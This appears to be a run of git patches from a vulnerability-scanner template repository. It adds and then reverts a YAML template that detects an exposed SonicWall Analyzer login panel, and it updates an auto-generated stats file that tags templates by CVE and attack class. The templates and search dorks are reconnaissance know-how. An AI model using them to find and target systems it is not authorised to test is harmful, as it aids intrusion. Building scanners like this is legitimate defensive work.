inurl:"auth.html" intitle:"SonicWall" tags: cve,cve2021,sonicwall,redirect requests: From 9d0685ec243d8808eab4a321810efdb2f6a93349 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:58:18 +0530 Subject: [PATCH 3000/4083] Create sonicwall-analyzer-login.yaml --- exposed-panels/sonicwall-analyzer-login.yaml | 27 ++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposed-panels/sonicwall-analyzer-login.yaml diff --git a/exposed-panels/sonicwall-analyzer-login.yaml b/exposed-panels/sonicwall-analyzer-login.yaml new file mode 100644 index 0000000000..64381e0725 --- /dev/null +++ b/exposed-panels/sonicwall-analyzer-login.yaml @@ -0,0 +1,27 @@ +id: sonicwall-analyzer-login + +info: + name: SonicWall Analyzer Login + author: princechaddha + severity: info + metadata: + google-dork: intitle:"SonicWall Analyzer Login" + tags: tech,sonicwall + +requests: + - method: GET + path: + - "{{BaseURL}}/sgms/auth" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Dell SonicWALL Analyzer Login" + - "SonicWall Analyzer Login" + condition: or + + - type: status + status: + - 200 From 199add7f53dd9781667d6375e18a9c98692cf3e7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 18 Oct 2021 20:59:05 +0530 Subject: [PATCH 3001/4083] Revert "Create sonicwall-analyzer-login.yaml" This reverts commit 9d0685ec243d8808eab4a321810efdb2f6a93349. --- exposed-panels/sonicwall-analyzer-login.yaml | 27 -------------------- 1 file changed, 27 deletions(-) delete mode 100644 exposed-panels/sonicwall-analyzer-login.yaml diff --git a/exposed-panels/sonicwall-analyzer-login.yaml b/exposed-panels/sonicwall-analyzer-login.yaml deleted file mode 100644 index 64381e0725..0000000000 --- a/exposed-panels/sonicwall-analyzer-login.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: sonicwall-analyzer-login - -info: - name: SonicWall Analyzer Login - author: princechaddha - severity: info - metadata: - google-dork: intitle:"SonicWall Analyzer Login" - tags: tech,sonicwall - -requests: - - method: GET - path: - - "{{BaseURL}}/sgms/auth" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Dell SonicWALL Analyzer Login" - - "SonicWall Analyzer Login" - condition: or - - - type: status - status: - - 200 From 2d50e768ce6d0843f1241c8fdb979f8ff6fcaeb1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 15:30:13 +0000 Subject: [PATCH 3003/4083] Auto Generated Templates Stats [Mon Oct 18 15:30:13 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1801 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 911 insertions(+), 910 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 4bed7d43d2..3b3ab8672e 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":827},{"name":"lfi","count":337},{"name":"panel","count":267},{"name":"xss","count":258},{"name":"wordpress","count":249},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":172},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":28},{"name":"jira","count":28},{"name":"cve2015","count":28},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"dns","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"deserialization","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"netgear","count":7},{"name":"api","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"docker","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"symantec","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"git","count":4},{"name":"exchange","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"zabbix","count":4},{"name":"symfony","count":4},{"name":"amazon","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"strapi","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"grafana","count":4},{"name":"fatpipe","count":4},{"name":"npm","count":4},{"name":"magmi","count":4},{"name":"wso2","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"vbulletin","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"druid","count":3},{"name":"r-seenet","count":3},{"name":"cve2007","count":3},{"name":"fanruan","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"zhiyuan","count":3},{"name":"mail","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"exposures","count":3},{"name":"bigip","count":3},{"name":"prometheus","count":3},{"name":"ofbiz","count":3},{"name":"jeesns","count":3},{"name":"httpd","count":3},{"name":"terramaster","count":3},{"name":"ebs","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"cloud","count":3},{"name":"mongodb","count":3},{"name":"kibana","count":3},{"name":"nacos","count":3},{"name":"nosqli","count":3},{"name":"node","count":3},{"name":"hoteldruid","count":3},{"name":"itop","count":3},{"name":"jellyfin","count":3},{"name":"log","count":3},{"name":"linkerd","count":3},{"name":"opensis","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"cves","count":3},{"name":"smtp","count":3},{"name":"tikiwiki","count":3},{"name":"lansweeper","count":3},{"name":"cacti","count":3},{"name":"paloalto","count":2},{"name":"ec2","count":2},{"name":"mailchimp","count":2},{"name":"huawei","count":2},{"name":"cve2005","count":2},{"name":"enumeration","count":2},{"name":"dos","count":2},{"name":"openfire","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"bucket","count":2},{"name":"couchdb","count":2},{"name":"maian","count":2},{"name":"qihang","count":2},{"name":"smb","count":2},{"name":"horde","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"s3","count":2},{"name":"status","count":2},{"name":"geowebserver","count":2},{"name":"aviatrix","count":2},{"name":"hostheader-injection","count":2},{"name":"backups","count":2},{"name":"spark","count":2},{"name":"commax","count":2},{"name":"activemq","count":2},{"name":"linux","count":2},{"name":"liferay","count":2},{"name":"jsf","count":2},{"name":"jboss","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"lotus","count":2},{"name":"akkadian","count":2},{"name":"text","count":2},{"name":"seeyon","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"db","count":2},{"name":"justwriting","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"bruteforce","count":2},{"name":"rockmongo","count":2},{"name":"ucmdb","count":2},{"name":"plesk","count":2},{"name":"places","count":2},{"name":"sonicwall","count":2},{"name":"sitecore","count":2},{"name":"wordfence","count":2},{"name":"prtg","count":2},{"name":"netis","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"prestashop","count":2},{"name":"upload","count":2},{"name":"mida","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"payara","count":2},{"name":"keycloak","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"minio","count":2},{"name":"trixbox","count":2},{"name":"ilo","count":2},{"name":"vcenter","count":2},{"name":"heroku","count":2},{"name":"guacamole","count":2},{"name":"kong","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"totemomail","count":2},{"name":"aruba","count":2},{"name":"ecology","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"xxljob","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"mcafee","count":2},{"name":"netsweeper","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"splunk","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"rancher","count":2},{"name":"leak","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"chyrp","count":2},{"name":"voipmonitor","count":2},{"name":"embed","count":2},{"name":"phpcollab","count":2},{"name":"electron","count":2},{"name":"bypass","count":2},{"name":"rstudio","count":2},{"name":"storage","count":2},{"name":"tidb","count":2},{"name":"odoo","count":2},{"name":"cache","count":2},{"name":"favicon","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"wuzhicms","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"hasura","count":2},{"name":"openvpn","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"wmt","count":1},{"name":"route","count":1},{"name":"office365","count":1},{"name":"shoretel","count":1},{"name":"hiawatha","count":1},{"name":"blue-ocean","count":1},{"name":"openrestry","count":1},{"name":"fiori","count":1},{"name":"playable","count":1},{"name":"acme","count":1},{"name":"sangfor","count":1},{"name":"cockpit","count":1},{"name":"jitsi","count":1},{"name":"wazuh","count":1},{"name":"extractor","count":1},{"name":"node-red-dashboard","count":1},{"name":"graphql","count":1},{"name":"iceflow","count":1},{"name":"nsasg","count":1},{"name":"karel","count":1},{"name":"nedi","count":1},{"name":"mdb","count":1},{"name":"selea","count":1},{"name":"mariadb","count":1},{"name":"sidekiq","count":1},{"name":"redis","count":1},{"name":"messaging","count":1},{"name":"openemr","count":1},{"name":"cve202","count":1},{"name":"episerver","count":1},{"name":"aura","count":1},{"name":"netmask","count":1},{"name":"mongo","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"huijietong","count":1},{"name":"gilacms","count":1},{"name":"resourcespace","count":1},{"name":"razor","count":1},{"name":"adiscon","count":1},{"name":"wifisky","count":1},{"name":"feifeicms","count":1},{"name":"spotify","count":1},{"name":"yealink","count":1},{"name":"rdp","count":1},{"name":"jfrog","count":1},{"name":"oscommerce","count":1},{"name":"interlib","count":1},{"name":"landrayoa","count":1},{"name":"testrail","count":1},{"name":"ecom","count":1},{"name":"discord","count":1},{"name":"traefik","count":1},{"name":"circontrorl","count":1},{"name":"dompdf","count":1},{"name":"manager","count":1},{"name":"tamronos","count":1},{"name":"opentsdb","count":1},{"name":"meraki","count":1},{"name":"stripe","count":1},{"name":"plc","count":1},{"name":"trane","count":1},{"name":"weglot","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"centos","count":1},{"name":"tongda","count":1},{"name":"comodo","count":1},{"name":"gsoap","count":1},{"name":"ems","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"redmine","count":1},{"name":"concrete","count":1},{"name":"expose","count":1},{"name":"darkstat","count":1},{"name":"elascticsearch","count":1},{"name":"linkedin","count":1},{"name":"panos","count":1},{"name":"iptime","count":1},{"name":"hubspot","count":1},{"name":"deviantart","count":1},{"name":"bing","count":1},{"name":"dotnet","count":1},{"name":"klog","count":1},{"name":"circleci","count":1},{"name":"streetview","count":1},{"name":"visualstudio","count":1},{"name":"graphite","count":1},{"name":"woocommerce","count":1},{"name":"exacqvision","count":1},{"name":"find","count":1},{"name":"tika","count":1},{"name":"jenzabar","count":1},{"name":"details","count":1},{"name":"flink","count":1},{"name":"fuelcms","count":1},{"name":"travis","count":1},{"name":"bedita","count":1},{"name":"spf","count":1},{"name":"solarlog","count":1},{"name":"cve2006","count":1},{"name":"stem","count":1},{"name":"fcm","count":1},{"name":"minimouse","count":1},{"name":"phpunit","count":1},{"name":"square","count":1},{"name":"mirai","count":1},{"name":"ilo4","count":1},{"name":"openx","count":1},{"name":"cerebro","count":1},{"name":"emby","count":1},{"name":"smi","count":1},{"name":"azkaban","count":1},{"name":"svn","count":1},{"name":"zookeeper","count":1},{"name":"zte","count":1},{"name":"proftpd","count":1},{"name":"spidercontrol","count":1},{"name":"etouch","count":1},{"name":"xampp","count":1},{"name":"mkdocs","count":1},{"name":"ricoh","count":1},{"name":"listserv","count":1},{"name":"finereport","count":1},{"name":"tensorboard","count":1},{"name":"vscode","count":1},{"name":"shiro","count":1},{"name":"email","count":1},{"name":"diris","count":1},{"name":"zeroshell","count":1},{"name":"zarafa","count":1},{"name":"package","count":1},{"name":"alerta","count":1},{"name":"aspnuke","count":1},{"name":"artica","count":1},{"name":"default","count":1},{"name":"tjws","count":1},{"name":"rockethchat","count":1},{"name":"cse","count":1},{"name":"labtech","count":1},{"name":"netgenie","count":1},{"name":"kafdrop","count":1},{"name":"totaljs","count":1},{"name":" default-login","count":1},{"name":"csrf","count":1},{"name":"codemeter","count":1},{"name":"glowroot","count":1},{"name":"wiki","count":1},{"name":"qdpm","count":1},{"name":"commscope","count":1},{"name":"jnoj","count":1},{"name":"scs","count":1},{"name":"auth","count":1},{"name":"szhe","count":1},{"name":"plugin","count":1},{"name":"maccmsv10","count":1},{"name":"luftguitar","count":1},{"name":"lg-nas","count":1},{"name":"codeigniter","count":1},{"name":"triconsole","count":1},{"name":"sophos","count":1},{"name":"dotnetnuke","count":1},{"name":"sql","count":1},{"name":"mrtg","count":1},{"name":"soar","count":1},{"name":"yachtcontrol","count":1},{"name":"wondercms","count":1},{"name":"cves2001","count":1},{"name":"geolocation","count":1},{"name":"emc","count":1},{"name":"dom","count":1},{"name":"erp-nc","count":1},{"name":"ambari","count":1},{"name":"krweb","count":1},{"name":"floc","count":1},{"name":"dvr","count":1},{"name":"directions","count":1},{"name":"dnssec","count":1},{"name":"keenetic","count":1},{"name":"plone","count":1},{"name":"ssltls","count":1},{"name":"weather","count":1},{"name":"hiboss","count":1},{"name":"jmx","count":1},{"name":"contentkeeper","count":1},{"name":"centreon","count":1},{"name":"ns","count":1},{"name":"panasonic","count":1},{"name":"calendarix","count":1},{"name":"crm","count":1},{"name":"optiLink","count":1},{"name":"esmtp","count":1},{"name":"zenario","count":1},{"name":"owasp","count":1},{"name":"geocode","count":1},{"name":"k8s","count":1},{"name":"moin","count":1},{"name":"graylog","count":1},{"name":"opm","count":1},{"name":"exponentcms","count":1},{"name":"domxss","count":1},{"name":"metinfo","count":1},{"name":"ulterius","count":1},{"name":"zcms","count":1},{"name":"pulsesecure","count":1},{"name":"panabit","count":1},{"name":"viewpoint","count":1},{"name":"cors","count":1},{"name":"rocketchat","count":1},{"name":"qvisdvr","count":1},{"name":"pagespeed","count":1},{"name":"visionhub","count":1},{"name":"timeclock","count":1},{"name":"grails","count":1},{"name":"lokalise","count":1},{"name":"roads","count":1},{"name":"timezone","count":1},{"name":"clusterengine","count":1},{"name":"phpwiki","count":1},{"name":"fortinet","count":1},{"name":"pivotaltracker","count":1},{"name":"metabase","count":1},{"name":"idemia","count":1},{"name":"place","count":1},{"name":"acontent","count":1},{"name":"twitter","count":1},{"name":"miscrsoft","count":1},{"name":"nuuo","count":1},{"name":"monitorr","count":1},{"name":"bingmaps","count":1},{"name":"smartblog","count":1},{"name":"javascript","count":1},{"name":"zm","count":1},{"name":"blind","count":1},{"name":"tcexam","count":1},{"name":"sureline","count":1},{"name":"gotmls","count":1},{"name":"buildkite","count":1},{"name":"limit","count":1},{"name":"distance","count":1},{"name":"doh","count":1},{"name":"netrc","count":1},{"name":"trilithic","count":1},{"name":"landray","count":1},{"name":"lotuscms","count":1},{"name":"hortonworks","count":1},{"name":"wooyun","count":1},{"name":"gateone","count":1},{"name":"shopxo","count":1},{"name":"seacms","count":1},{"name":"dbeaver","count":1},{"name":"pyramid","count":1},{"name":"sendgrid","count":1},{"name":"dvwa","count":1},{"name":"websvn","count":1},{"name":"iterable","count":1},{"name":"jaspersoft","count":1},{"name":"fortigate","count":1},{"name":"circontrol","count":1},{"name":"javamelody","count":1},{"name":"sourcebans","count":1},{"name":"arl","count":1},{"name":"beanstalk","count":1},{"name":"sage","count":1},{"name":"solman","count":1},{"name":"netdata","count":1},{"name":"shopware","count":1},{"name":"flexbe","count":1},{"name":"syslog","count":1},{"name":"cscart","count":1},{"name":"cofax","count":1},{"name":"bazarr","count":1},{"name":"redhat","count":1},{"name":"froxlor","count":1},{"name":"gurock","count":1},{"name":"apiman","count":1},{"name":"apos","count":1},{"name":"gridx","count":1},{"name":"thinkadmin","count":1},{"name":"okta","count":1},{"name":"moinmoin","count":1},{"name":"dotclear","count":1},{"name":"lighttpd","count":1},{"name":"elevation","count":1},{"name":"cloudinary","count":1},{"name":"yzmcms","count":1},{"name":"gitlist","count":1},{"name":"couchbase","count":1},{"name":"hadoop","count":1},{"name":"autocomplete","count":1},{"name":"ruckus","count":1},{"name":"jumpcloud","count":1},{"name":"tapestry","count":1},{"name":"rsyncd","count":1},{"name":"tinypng","count":1},{"name":"dropbox","count":1},{"name":"api-manager","count":1},{"name":"gitea","count":1},{"name":"terraform","count":1},{"name":"gstorage","count":1},{"name":"rabbitmq","count":1},{"name":"servicenow","count":1},{"name":"loganalyzer","count":1},{"name":"jquery","count":1},{"name":"influxdb","count":1},{"name":"swagger","count":1},{"name":"ssl","count":1},{"name":"webmin","count":1},{"name":"clockwatch","count":1},{"name":"drone","count":1},{"name":"clickhouse","count":1},{"name":"mautic","count":1},{"name":"memcached","count":1},{"name":"gunicorn","count":1},{"name":"sco","count":1},{"name":"beanshell","count":1},{"name":"fastapi","count":1},{"name":"phpshowtime","count":1},{"name":"alibaba","count":1},{"name":"bolt","count":1},{"name":"newrelic","count":1},{"name":"vsftpd","count":1},{"name":"asana","count":1},{"name":"instagram","count":1},{"name":"secmail","count":1},{"name":"lancom","count":1},{"name":"speed","count":1},{"name":"pacsone","count":1},{"name":"bigbluebutton","count":1},{"name":"raspap","count":1},{"name":"webftp","count":1},{"name":"myvuehelp","count":1},{"name":"svnserve","count":1},{"name":"sgp","count":1},{"name":"mysql","count":1},{"name":"magicflow","count":1},{"name":"rhymix","count":1},{"name":"csrfguard","count":1},{"name":"pihole","count":1},{"name":"embedthis","count":1},{"name":"springframework","count":1},{"name":"k8","count":1},{"name":"postmark","count":1},{"name":"glances","count":1},{"name":"announcekit","count":1},{"name":"anchorcms","count":1},{"name":"zmanda","count":1},{"name":"upnp","count":1},{"name":"csod","count":1},{"name":"mailgun","count":1},{"name":"myucms","count":1},{"name":"powercreator","count":1},{"name":"fortigates","count":1},{"name":"webui","count":1},{"name":"accela","count":1},{"name":"lutron","count":1},{"name":"appweb","count":1},{"name":"expn","count":1},{"name":"nuxeo","count":1},{"name":"oidc","count":1},{"name":"fedora","count":1},{"name":"cyberoam","count":1},{"name":"fortiweb","count":1},{"name":"nomad","count":1},{"name":"photo","count":1},{"name":"locations","count":1},{"name":"pmb","count":1},{"name":"smartsense","count":1},{"name":"empirecms","count":1},{"name":"opensns","count":1},{"name":"pcoip","count":1},{"name":"achecker","count":1},{"name":"tracer","count":1},{"name":"actuator","count":1},{"name":"phpinfo","count":1},{"name":"ipstack","count":1},{"name":"sarg","count":1},{"name":"okiko","count":1},{"name":"tileserver","count":1},{"name":"nerdgraph","count":1},{"name":"eyelock","count":1},{"name":"sprintful","count":1},{"name":"xunchi","count":1},{"name":"turbocrm","count":1},{"name":"lanproxy","count":1},{"name":"qsan","count":1},{"name":"etherpad","count":1},{"name":"openerp","count":1},{"name":"opencast","count":1},{"name":"ueditor","count":1},{"name":"basic-auth","count":1},{"name":"discourse","count":1},{"name":"cobub","count":1},{"name":"twitter-server","count":1},{"name":"bash","count":1},{"name":"wamp","count":1},{"name":"maxsite","count":1},{"name":"pendo","count":1},{"name":"xiuno","count":1},{"name":"xdcms","count":1},{"name":"mpsec","count":1},{"name":"chinaunicom","count":1},{"name":"shopizer","count":1},{"name":"ognl","count":1},{"name":"uwsgi","count":1},{"name":"pagerduty","count":1},{"name":"owa","count":1},{"name":"chevereto","count":1},{"name":"nc2","count":1},{"name":"clink-office","count":1},{"name":"tectuus","count":1},{"name":"database","count":1},{"name":"bookstack","count":1},{"name":"mantisbt","count":1},{"name":"mapbox","count":1},{"name":"webmodule-ee","count":1},{"name":"spring","count":1},{"name":"scimono","count":1},{"name":"viewlinc","count":1},{"name":"simplecrm","count":1},{"name":"imap","count":1},{"name":"sar2html","count":1},{"name":"cgi","count":1},{"name":"alertmanager","count":1},{"name":"ewebs","count":1},{"name":"daybyday","count":1},{"name":"cocoon","count":1},{"name":"nexusdb","count":1},{"name":"postgres","count":1},{"name":"ruby","count":1},{"name":"olivetti","count":1},{"name":"oneblog","count":1},{"name":"novnc","count":1},{"name":"werkzeug","count":1},{"name":"kerbynet","count":1},{"name":"rubedo","count":1},{"name":"spectracom","count":1},{"name":"axiom","count":1},{"name":"phpfusion","count":1},{"name":"calendly","count":1},{"name":"tor","count":1},{"name":"geutebruck","count":1},{"name":"tugboat","count":1},{"name":"wavlink","count":1},{"name":"realteo","count":1},{"name":"phalcon","count":1},{"name":"bullwark","count":1},{"name":"b2evolution","count":1},{"name":"remkon","count":1},{"name":"perl","count":1},{"name":"livezilla","count":1},{"name":"kindeditor","count":1},{"name":"faraday","count":1},{"name":"nweb2fax","count":1},{"name":"octoprint","count":1},{"name":"avtech","count":1},{"name":"robomongo","count":1},{"name":"redcap","count":1},{"name":"craftcms","count":1},{"name":"74cms","count":1},{"name":"checkpoint","count":1},{"name":"wing-ftp","count":1},{"name":"zzzcms","count":1},{"name":"jsp","count":1},{"name":"cloudron","count":1},{"name":"tpshop","count":1},{"name":"xmlchart","count":1},{"name":"st","count":1},{"name":"htmli","count":1},{"name":"salesforce","count":1},{"name":"ghost","count":1},{"name":"placeos","count":1},{"name":"gloo","count":1},{"name":"visualtools","count":1},{"name":"ioncube","count":1},{"name":"setup","count":1},{"name":"saltapi","count":1},{"name":"webadmin","count":1},{"name":"synnefo","count":1},{"name":"vnc","count":1},{"name":"sentry","count":1},{"name":"gespage","count":1},{"name":"omi","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"mobileiron","count":1},{"name":"shoppable","count":1},{"name":"clave","count":1},{"name":"wildfly","count":1},{"name":"zms","count":1},{"name":"woocomernce","count":1},{"name":"logontracer","count":1},{"name":"ntopng","count":1},{"name":"elasticsearch","count":1},{"name":"parentlink","count":1},{"name":"kyan","count":1},{"name":"mantis","count":1},{"name":"mongoshake","count":1},{"name":"ganglia","count":1},{"name":"buttercms","count":1},{"name":"sceditor","count":1},{"name":"rmi","count":1},{"name":"zyxel","count":1},{"name":"nette","count":1},{"name":"fortilogger","count":1},{"name":"eg","count":1},{"name":"matrix","count":1},{"name":"jeewms","count":1},{"name":"plastic","count":1},{"name":"cherokee","count":1},{"name":"motorola","count":1},{"name":"javafaces","count":1},{"name":"nimble","count":1},{"name":"nps","count":1},{"name":"processmaker","count":1},{"name":"gogs","count":1},{"name":"sqlite","count":1},{"name":"jenkin","count":1},{"name":"wakatime","count":1},{"name":"key","count":1},{"name":"redwood","count":1},{"name":"kubeflow","count":1},{"name":"duomicms","count":1},{"name":"majordomo2","count":1},{"name":"geddy","count":1},{"name":"spip","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"nordex","count":1},{"name":"zend","count":1},{"name":"weiphp","count":1},{"name":"asus","count":1},{"name":"camunda","count":1},{"name":"pippoint","count":1},{"name":"frontpage","count":1},{"name":"loqate","count":1},{"name":"nifi","count":1},{"name":"pgadmin","count":1},{"name":"nearby","count":1},{"name":"biometrics","count":1},{"name":"openweather","count":1},{"name":"fastcgi","count":1},{"name":"phpfastcache","count":1},{"name":"subrion","count":1},{"name":"haproxy","count":1},{"name":"graph","count":1},{"name":"octobercms","count":1},{"name":"tenda","count":1},{"name":"whm","count":1},{"name":"sonarcloud","count":1},{"name":"tensorflow","count":1},{"name":"timesheet","count":1},{"name":"burp","count":1},{"name":"openstack","count":1},{"name":"portainer","count":1},{"name":"vidyo","count":1},{"name":"mod-proxy","count":1},{"name":"xvr","count":1},{"name":"acexy","count":1},{"name":"youtube","count":1},{"name":"expressjs","count":1},{"name":"goahead","count":1},{"name":"primetek","count":1},{"name":"vsphere","count":1},{"name":"servicedesk","count":1},{"name":"digitalocean","count":1},{"name":"eprints","count":1},{"name":"mediumish","count":1},{"name":"natemail","count":1},{"name":"rujjie","count":1},{"name":"addpac","count":1},{"name":"websphere","count":1},{"name":"linksys","count":1},{"name":"monitorix","count":1},{"name":"wavemaker","count":1},{"name":"h3c-imc","count":1},{"name":"eyou","count":1},{"name":"cloudflare","count":1},{"name":"opensmtpd","count":1},{"name":"postmessage","count":1},{"name":"circle","count":1},{"name":"clockwork","count":1},{"name":"elfinder","count":1},{"name":"xml","count":1},{"name":"rmc","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":273},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"nadino","count":10},{"name":"wdahlenb","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"oppsec","count":7},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dogasantos","count":7},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"pentest_swissky","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"logicalhunter","count":6},{"name":"rootxharsh","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"lu4nx","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"iamnoooob","count":5},{"name":"johnk3r","count":5},{"name":"elsfa7110","count":5},{"name":"joanbono","count":5},{"name":"github.com/its0x08","count":4},{"name":"nodauf","count":4},{"name":"incogbyte","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"vsh00t","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"0w4ys","count":3},{"name":"skeltavik","count":3},{"name":"shine","count":3},{"name":"fyoorer","count":3},{"name":"sullo","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"impramodsargar","count":3},{"name":"dudez","count":3},{"name":"emenalf","count":3},{"